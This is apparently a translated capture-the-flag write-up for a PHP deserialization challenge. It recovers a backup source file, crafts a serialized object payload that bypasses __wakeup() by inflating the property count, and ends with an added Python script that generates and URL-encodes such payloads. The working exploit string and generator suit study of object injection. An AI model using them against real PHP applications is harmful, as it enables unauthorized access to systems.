[极客大挑战 2019]PHP

KaiWn


First, open the challenge; the key hint is visible at a glance.

[screenshot: challenge page]

The backup file can be found with a scanning tool. I used 御剑 (Yujian) and for some reason it did not find anything, so I checked www.zip and index.php.bak by hand.

Then download the archive and unzip it to get:

[screenshot: extracted files]

Looking through the three source files:

      <?php
      include 'flag.php';
      
      
      error_reporting(0);
      
      
      class Name{
          private $username = 'nonono';
          private $password = 'yesyes';
      
          public function __construct($username,$password){
              $this->username = $username;
              $this->password = $password;
          }
      
          function __wakeup(){
              $this->username = 'guest';
          }
      
          function __destruct(){
              if ($this->password != 100) {
                  echo "</br>NO!!!hacker!!!</br>";
                  echo "You name is: ";
                  echo $this->username;echo "</br>";
                  echo "You password is: ";
                  echo $this->password;echo "</br>";
                  die();
              }
              if ($this->username === 'admin') {
                  global $flag;
                  echo $flag;
              }else{
                  echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
                  die();
      
                  
              }
          }
      }
      ?>
      <div id="world">
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
          </div>
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
          </div>
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
          <?php
          include 'class.php';
          $select = $_GET['select'];
          $res=unserialize(@$select);
          ?>
          </div>
          <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
      </div>
      <script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
      <script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
      <script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
      <script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
      <script  src="index.js"></script>
      </body>
      </html>

After auditing the code, it looks like a select parameter has to be submitted, and its value must be a serialized object with username = 'admin' and password = '100' to pass the checks.

      <?php
      class Name{
          private $username = 'admin';
          private $password = 100;
      }
      $a=new Name();
      echo serialize($a);
      ?>

The result is O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

Submitting it did not succeed.

[screenshot: first attempt]

Then I noticed that the spaces had not been copied over, so I submitted again.

[screenshot: second attempt]

[screenshot: response]

Still wrong, so I had to audit the source again.

It turns out that when serialize() is called on an object from outside the class, the class's __sleep() method is called first; likewise, when unserialize() is called, __wakeup() is called first.

Since __wakeup() is called, it has to be bypassed or defeated. This method has a weakness: when the property count declared in the serialized string is greater than the actual number of properties, __wakeup() is skipped.

So after modification the payload becomes ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

[screenshot: third attempt]

It still did not work. Looking at the URL again, I saw that %25 had been added, because the submission was URL-encoded; removing it by hand gives the flag.

[screenshot: flag]
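Added example, not part of the original post: a small Python script (helper names php_str, mangle, php_serialize_object and select_param are my own) that reproduces PHP's serialize() format for the two value types the challenge uses and shows the three details the writeup tripped over: private property names carry invisible NUL bytes that count toward the s:14 length, the declared property count can be set higher than the real one, and %00 must be percent-encoded exactly once.

```python
from urllib.parse import quote


def php_str(s: str) -> str:
    """Serialise a PHP string. The length is in bytes, so NUL bytes count."""
    return f's:{len(s.encode())}:"{s}";'


def php_value(v) -> str:
    if isinstance(v, bool):
        return f'b:{int(v)};'
    if isinstance(v, int):
        return f'i:{v};'
    if isinstance(v, str):
        return php_str(v)
    raise TypeError(f'unsupported PHP value type: {type(v).__name__}')


def mangle(cls: str, name: str, visibility: str) -> str:
    """PHP prefixes non-public property names with NUL bytes:
    private -> "\\0Class\\0name", protected -> "\\0*\\0name", public -> "name".
    So "\\0Name\\0username" is s:14, while the copied "Nameusername" is only 12."""
    if visibility == 'private':
        return f'\0{cls}\0{name}'
    if visibility == 'protected':
        return f'\0*\0{name}'
    return name


def php_serialize_object(cls: str, props: dict, visibility: str = 'private',
                         declared_count=None) -> str:
    """Build O:<len>:"<cls>":<count>:{...}. declared_count lets the count field
    disagree with the real number of properties; PHP before 5.6.25 / 7.0.10
    then skipped __wakeup(), the bug the writeup relies on. Fixed releases do
    not, so keeping PHP current and never calling unserialize() on
    user-controlled input are the mitigations."""
    body = ''.join(php_str(mangle(cls, k, visibility)) + php_value(v)
                   for k, v in props.items())
    count = len(props) if declared_count is None else declared_count
    return f'O:{len(cls)}:"{cls}":{count}:{{{body}}}'


def select_param(payload: str) -> str:
    """Percent-encode once: NUL becomes %00. Pasting an already encoded string
    into a browser encodes '%' again, producing the %2500 the writeup had to strip."""
    return quote(payload, safe=':";{}')


if __name__ == '__main__':
    props = {'username': 'admin', 'password': 100}           # constructed sample
    print(php_serialize_object('Name', props).encode())      # NULs shown as \x00
    print(select_param(php_serialize_object('Name', props, declared_count=3)))
```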
